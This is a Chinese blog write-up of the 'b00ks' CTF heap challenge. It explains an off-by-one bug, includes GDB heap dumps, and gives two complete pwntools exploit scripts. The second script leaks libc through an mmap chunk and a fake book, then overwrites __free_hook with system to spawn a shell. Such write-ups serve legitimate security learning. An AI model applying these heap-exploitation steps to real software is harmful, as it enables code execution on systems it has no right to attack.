第一次接触堆题--wp

最新推荐文章于 2023-02-18 21:00:43 发布
最新推荐文章于 2023-02-18 21:00:43 发布
阅读量166 收藏
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51521220/article/details/127885217
版权

第一次接触堆题b00ks–wp

b00ks

考察off-by-one

漏洞点在

分析exp

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8

import sys
import os
import os.path
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
p=process('./b00ks')

#p=remote('node3.buuoj.cn',26386)

def cmd(choice):
    p.recvuntil('> ')
    p.sendline(str(choice))

def create(book_size, book_name, desc_size, desc):
    cmd(1)
    p.recvuntil(': ')
    p.sendline(str(book_size))
    p.recvuntil(': ')
    if len(book_name) == book_size:
        p.send(book_name)
    else:
        p.sendline(book_name)
    p.recvuntil(': ')
    p.sendline(str(desc_size))
    p.recvuntil(': ')
    if len(desc) == desc_size:
        p.send(desc)
    else:
        p.sendline(desc)

def remove(idx):
    cmd(2)
    p.recvuntil(': ')
    p.sendline(str(idx))

def edit(idx, desc):
    cmd(3)
    p.recvuntil(': ')
    p.sendline(str(idx))
    p.recvuntil(': ')
    p.send(desc)

def author_name(author):
    cmd(5)
    p.recvuntil(': ')
    p.send(author)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def main():
    p.recvuntil('name: ')
    p.sendline('x' * (0x20 - 5) + 'leak:')
    #pause()
    create(0x20, 'tmp a', 0x20, 'b') # 1
    cmd(4)
    p.recvuntil('Author: ')
    p.recvuntil('leak:')
    heap_leak = u64(p.recvline().strip().ljust(8, '\x00'))
    
    p.info('heap leak @ 0x%x' % heap_leak)
    heap_base = heap_leak - 0x1080
    #0x0000555555758080 - 0x1080 = 0x555555757000
    create(0x20, 'buf 1', 0x20, 'desc buf') # 2
    create(0x20, 'buf 2', 0x20, 'desc buf 2') # 3
    
    gdb.attach(p)
    remove(2)
    remove(3)
    pause()
    ptr = heap_base + 0x1180
    pause()
    payload = p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10) + '\x00' * 0xe0 + p64(0x100)
    create(0x20, 'name', 0x108, 'overflow') # 4
    create(0x20, 'name', 0x100 - 0x10, 'target') # 5
    create(0x20, '/bin/sh\x00', 0x200, 'to arbitrary read write') # 6
    edit(4, payload)
    remove(5)
    edit(4, p64(0x30) + p64(4) + p64(heap_base + 0x11a0) + p64(heap_base + 0x10c0) + '\n')

    def write_to(addr, content, size):
        edit(4, p64(addr) + p64(size + 0x100) + '\n')
        edit(6, content + '\n')

    def read_at(addr):
        edit(4, p64(addr) + '\n')
        cmd(4)
        p.recvuntil('Description: ')
        p.recvuntil('Description: ')
        p.recvuntil('Description: ')
        content = p.recvline()[:-1]
        p.info(content)
        return content

    libc_leak = u64(read_at(heap_base + 0x11e0).ljust(8, '\x00')) - 0x3c4b78
    p.info('libc leak @ 0x%x' % libc_leak)
    write_to(libc_leak + libc.symbols['__free_hook'], p64(libc_leak + libc.symbols['system']), 0x10)
    remove(6)
    p.interactive()

if __name__ == '__main__':
    main()

创建的book2(绿),book3(红)
在这里插入图片描述

free后

在这里插入图片描述

free形成的fastbins链流程

在这里插入图片描述

再次创建book4

在这里插入图片描述

查看heap堆进行验证

在这里插入图片描述

猜想正确,所以目前来说

book4
book_ptr = 0x56049cade160
bookname_ptr = 0x56049cade190
description_ptr = 0x56049cade1c0

在这里插入图片描述

这里创建了三本书ID=4、5、6

接着分析5,6

在这里插入图片描述

book5
book_ptr = 0x56049cade100
bookname_ptr = 0x56049cade130
description_ptr = 0x56049cade2d0

在这里插入图片描述

book6
book_ptr = 0x56049cade0a0
bookname_ptr = 0x56049cade0d0
description_ptr = 0x56049cade3d0

然后对book4的description进行伪造book_chunk且这个chunk为使用中的chunk

payload
p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10) + '\x00' * 0xe0 + p64(0x100)

结构如下:

0x56049cade1d0:	0x0000000000000000	0x0000000000000101
0x56049cade1e0:	0x000056049cade168	0x000056049cade170
0x56049cade1f0:	0x0000000000000000	0x0000000000000000
0x56049cade200:	0x0000000000000000	0x0000000000000000
0x56049cade210:	0x0000000000000000	0x0000000000000000
0x56049cade220:	0x0000000000000000	0x0000000000000000
0x56049cade230:	0x0000000000000000	0x0000000000000000
0x56049cade240:	0x0000000000000000	0x0000000000000000
0x56049cade250:	0x0000000000000000	0x0000000000000000
0x56049cade260:	0x0000000000000000	0x0000000000000000
0x56049cade270:	0x0000000000000000	0x0000000000000000
0x56049cade280:	0x0000000000000000	0x0000000000000000
0x56049cade290:	0x0000000000000000	0x0000000000000000
0x56049cade2a0:	0x0000000000000000	0x0000000000000000
0x56049cade2b0:	0x0000000000000000	0x0000000000000000
0x56049cade2c0:	0x0000000000000000	0x0000000000000000
0x56049cade2d0:	0x0000000000000100	0x0000000000000100

在写的时候还把book5的description_chunk的p位改了

同时删除book5,触发unlink

到这里就不懂了QAQ。。。

另外的思路

还是off_by_one

前面步骤相同

但是后面就不利用unlink

注意—这里创建的是很大的空间add(0x2100,‘name’,0x2100,‘description’)

这样就能利用mmap去创建这个堆块,同时因为 mmap 分配的内存与 libc 之前存在固定的偏移因此可以推算出 libc 的基地址

在这里插入图片描述

可以看到book2的description的ptr变成了0x00007fee88872010,且heap里没有看到它

这就是通过mmap创建的堆块

并且和libc的基址存在固定偏移

现在就需要去泄露这块地址

方法就是通过 选择4 输出fake_book

fake_book的结构如下

在这里插入图片描述

id=1
name_ptr=0x000055ace53e6198
description_ptr=0x000055ace53e6198
//	0x000055ace53e6198  --->这个地址是book2的ptr+8也就是存储的是book2的			   
					description_ptr=0x00007fee882c1000
description_size=0x1000

重新编辑ather_name,将book1的ptr后一字节覆盖为\x00,从而指向我们的fake_book

0x55ace53e6160--->0x55ace53e6100

当选项4时

name和description就会输出0x00007fee882c1000

之后减去固定偏移,这样就能得到libc的基址

在这里插入图片描述

libc_base = book2_des_ptr-0x5b1010

得到了libc的基址

就能得到free_hook和system函数的got

free_hook = libc_base+libc.symbols["__free_hook"]
system = libc_base+libc.symbols["system"]

最后一步

将system的值写入到free_hook的地址处,并触发free()函数(free掉的地址里应该填入"/bin/sh")

怎样写入呢

答:还是fake_book

之前通过向fake_book写入了book2的description指针所在的地址

也就是

fake_book.description = book2_ptr+8(表示book2.name的所在的地址)

所以当我们edit(1)时

就是对book2_ptr+8这个地址里的内容(原来存储name的地址)进行覆写

所以我们可以写入free_hook的地址

当我们edit(2)时

编写的就是free_hook的地址里面的内容

exp

edit(1,p64(bin_sh)+p64(free_hook))
edit(2,system)
remove(2)

完整exp

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8

import sys
import os
import os.path
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
p=process('./b00ks')

#p=remote('node3.buuoj.cn',26386)

def cmd(choice):
    p.recvuntil('> ')
    p.sendline(str(choice))

def create(book_size, book_name, desc_size, desc):
    cmd(1)
    p.recvuntil(': ')
    p.sendline(str(book_size))
    p.recvuntil(': ')
    if len(book_name) == book_size:
        p.send(book_name)
    else:
        p.sendline(book_name)
    p.recvuntil(': ')
    p.sendline(str(desc_size))
    p.recvuntil(': ')
    if len(desc) == desc_size:
        p.send(desc)
    else:
        p.sendline(desc)

def remove(idx):
    cmd(2)
    p.recvuntil(': ')
    p.sendline(str(idx))

def edit(idx, desc):
    cmd(3)
    p.recvuntil(': ')
    p.sendline(str(idx))
    p.recvuntil(': ')
    p.sendline(desc)

def author_name(author):
    cmd(5)
    p.recvuntil(': ')
    p.sendline(author)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def main():
    p.recvuntil('name: ')
    p.sendline('x' * (0x20 - 5) + 'leak:')
    #pause()
    create(0x90, 'tmp a', 0x90, 'b') # 1
    
    cmd(4)
    p.recvuntil('Author: ')
    p.recvuntil('leak:')
    heap_leak = u64(p.recvline().strip().ljust(8, '\x00'))
    create(0x21000,"aaa",0x21000,"bbb")
    p.info('heap leak @ 0x%x' % heap_leak)
    
    payload1='a'*0x40+p64(1)+p64(heap_leak+0x38)*2+p64(0x1000)
    
    edit(1, payload1)
    author_name('a'*0x20)
    cmd(4)
    p.recvuntil('Name: ')
    book2_des_ptr = u64(p.recv(6).ljust(8,'\x00'))
    libc_base = book2_des_ptr-0x5b1010
    print("libc "+hex(libc_base))

    
    #pause()
    free_hook = libc_base + libc.symbols["__free_hook"]
    system = libc_base+libc.symbols["system"]
    bin_sh = libc_base+libc.search("/bin/sh").next()

    edit(1,p64(bin_sh)+p64(free_hook))
    #gdb.attach(p)
    
    edit(2,p64(system))
    #pause()
    remove(2)
    
    p.interactive()

if __name__ == "__main__":
    main()
Oops-re
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1475
ciscn2022-线上-半决-pwn
mmap实现原理解析
weixin_42937012的博客
11-11 4613
文章主要是探索mmap的映射原理,前两节借用其他文章讲解mmap对磁盘文件的映射,同时令我对于项目代码中对于mmap 通过/dev/mem对物理内存直接映射的过程,因此做出了一个探索
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 454
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
日志 7.13 pwn 堆溢出基础知识
RobinZZX的博客
07-13 1511
堆溢出 先上堆图: 条件: 可以写入堆 大小无限制 堆的数据结构 一般情况下,物理相邻的两个空闲 chunk 会被合并为一个 chunk struct malloc_chunk { INTERNAL_SIZE_T prev_size; /*上一个chunk空闲时记录上一个chunk的大小,上一个chunk被使用时作为上个chunk的数据部分 */ INTERNAL_SIZE_...
mmap函数参数讲解
wk_bjut_edu_cn的博客
05-27 7122
1.mmap-创建内存映射    作用:将磁盘文件的数据映射到内存,用户通过内存就能修改磁盘文件    函数原型:void *mmap{ void *addr; //映射区首地址,传NULL size_t length; //映射区的大小 //会自动调为4k的整数倍 //不能为0 //一般文件多大,length就指定多大 int prot; //映射区权限 //PROT_RE...
wp-autoblog-trial.1.2.9.zip
06-27
wp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog-trial.1.2.9.zipwp-autoblog...
wp-live-chat-support-master 离线 安装包
01-11
wp-live-chat-support-master 离线 安装包 wp-live-chat-support-master 离线 安装包 wp-live-chat-support-master 离线 安装包 wp-live-chat-support-master 离线 安装包 wp-live-chat-support-master 离线 安装包
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
wp-script-core
09-07
wp-script-core wp-script-core wp的一个插件 喜欢的可以下载
wp-pot-cli:通过cli运行wp-pot脚本
02-05
在这里做:安装$ npm install --global wp-pot-cli用法$ wp-pot --help Generate pot-files for WordPress localization Usage $ wp-pot <options> Options --bug-report, -b Header with URL for reporting ...
进程分配内存的两种方式--brk() 和mmap()(不设计共享内存)
热门推荐
鱼思故渊的专栏
09-23 1万+
如何查看进程发生缺页中断的次数?          用ps -o majflt,minflt -C program命令查看。           majflt代表major fault,中文名叫大错误,minflt代表minor fault,中文名叫小错误。           这两个数值表示一个进程自启动以来所发生的缺页中断的次数。 发成缺页中断后,执行了那些操作?
Asis CTF 2016 b00ks
Maxmalloc的博客
10-28 891
自己做的第一个堆,复现了很久,遇到了各种问。希望这篇博客写的详细一点,能够把自己遇到的坑都写出来。 分析源码 先运行一下,可以知道这是一个图书管理系统,下面主要分析一下各个功能的源码 Welcome to ASISCTF book library Enter author name: hihih 1.Create a book 2.Delete a book 3.Edit a book 4....
Asis CTF 2016——b00ks
04-18 354
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
c语言mmap字符串加偏移得到,c语言实现mmap内存映射读取文件和文件加密
weixin_42523326的博客
05-17 181
#define _CRT_SECURE_NO_WARNINGS 1#include #include #include #include #include #define LOGD printf#if _WIN32#include #include #include #define stat _stat#else#include #include #include #include #endif...
深入理解MMAP原理,让大厂都爱不释手的技术
m0_64420071的博客
07-12 979
如微信的MMKV 组件、美团的Logan组件,还有微信的日志模块xlog,为什么大厂偏爱它呢?他到底有什么魔力么? addr 代表映射的虚拟内存起始地址; length 代表该映射长度; prot 描述了这块新的内存区域的访问权限; flags 描述了该映射的类型; fd 代表文件描述符; offset 代表文件内的偏移值。 mmap的强大之处在于,它可以根据参数配置,用于创建共享内存,从而提高文件映射区域的IO效率,实现IO零拷贝,后面讲下零拷贝的技术,对比下,决定这些功能的主要就...
Linux环境进程间通信: 共享内存
吾欲乘风
08-21 1840
采用共享内存通信的一个显而易见的好处是效率高,因为进程可以直接读写内存,而不需要任何数据的拷贝。对于像管道和消息队列等通信方式,则需要在内核和用户空间进行四次的数据拷贝,而共享内存则只拷贝两次数据[1]:一次从输入文件到共享内存区,另一次从共享内存区到输出文件。实际上,进程之间在共享内存时,并不总是读写少量数据后就解除映射,有新的通信时,再重新建立共享内存区域。而是保持共享区域,直到通信完毕为止,
mmap函数和sysconf函数使用页偏移例子--linux函数
《我是你的正能量》
03-20 1749
#include #include #include #include #include #include #define handle_error(msg) \ do { perror(msg); exit(EXIT_FAILURE); } while (0)
wp-rest-api jwt
最新发布
09-13
WP-REST-API 是WordPress 的一种接口,它通过提供标准化的RESTful API,允许开发人员使用HTTP请求来访问和操作WordPress站点的内容和数据。通过这个接口,开发人员可以使用不同的编程语言和技术来与WordPress进行交互,从而使得开发更加灵活和自由。 JWT(JSON Web Token)是一种用于认证和授权的开放标准。它通过将用户信息和权限信息编码成一种加密的令牌,以实现跨服务器和跨域的身份验证。JWT 是由三部分组成的:头部、负载和签名。头部包含令牌的加密算法和类型信息,负载包含用户的相关信息,签名用于验证令牌的真实性和完整性。 WP-REST-API JWT整合了WordPress的REST API和JWT的认证机制,使得在使用WP-REST-API进行开发的过程中,可以增加身份验证和授权的功能。它允许开发人员在请求WordPress REST API时,通过在请求头或参数中提供有效的JWT令牌来验证用户的身份和权限,并根据令牌中的负载信息来进行授权。 WP-REST-API JWT的使用具有很多优势。首先,它提供了一种轻量级的身份验证方式,减少了开发的复杂性。其次,通过JWT令牌的机制,可以实现无状态的认证和授权,提高了性能和可扩展性。此外,JWT还提供了一种可靠的机制来防止伪造和篡改请求数据,增强了系统的安全性。 总而言之,WP-REST-API JWT为开发人员提供了一种方便、灵活和安全的方式来使用WordPress的REST API。它简化了身份验证和授权的过程,并通过使用JWT令牌提高了系统的性能和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值